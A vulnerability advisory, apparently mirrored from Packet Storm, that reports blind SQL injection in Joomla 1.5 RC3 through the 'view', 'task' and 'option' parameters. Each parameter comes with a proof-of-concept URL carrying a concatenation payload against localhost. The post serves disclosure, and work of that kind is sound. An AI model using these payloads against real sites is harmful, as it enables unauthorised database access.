Lucene search

K

joomla15-blindsql.txt

šŸ—“ļøĀ 02 Dec 2007Ā 00:00:00Reported byĀ Beenu AroraTypeĀ 
packetstorm
Ā packetstorm
šŸ”—Ā packetstormsecurity.comšŸ‘Ā 16Ā Views

Blind SQL Injection in Joomla 1.5 RC3, parameter 'view', 'task', and 'option', POC URLs for each parameter, and details of the vulnerabilit

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Thanks to team of Darkc0de.com  
  
Blind Sql-Injection in Joomla 1.5 RC3  
  
URL : http://localhost/index.php  
  
1. Parameter = view  
  
The following changes were applied to the original request:  
Ā• Set parameter 'view's value to 'somechars'%20+%20'article'  
  
  
POC URL : http://localhost/index.php?option=com_content&view=somechars'%20+%20'article&id=25&Itemid=28  
  
This test uses several different HTTP requests in order to verify the existence of a Blind SQL  
Injection vulnerability. The resulting test responses show that requests containing conditions with  
the same logical values were identical to the original valid response, and the responses with  
different values were not. This indicates that an SQL query is being executed at the back-end  
database, and that the injected values affect the original query  
  
2. Parameter = task  
  
The following changes were applied to the original request:  
Ā• Set parameter 'task's value to 'somechars%27+%2B+%27search'  
  
  
POC URL : http://localhost/index.php?searchword=&task=somechars%27+%2B+%27search&option=com_search  
  
3. Parameter = option  
  
The following changes were applied to the original request:  
Ā• Set parameter 'option's value to 'somechars%27+%2B+%27com_search'  
  
POC URL :http://localhost/index.php?searchword=&task=search&option=somechars%27+%2B+%27com_search  
  
~~~~~~~~~~mail : [email protected]~~~~~~~~~~~~~~~~  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactĀ us for a demo andĀ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
16
.json
Report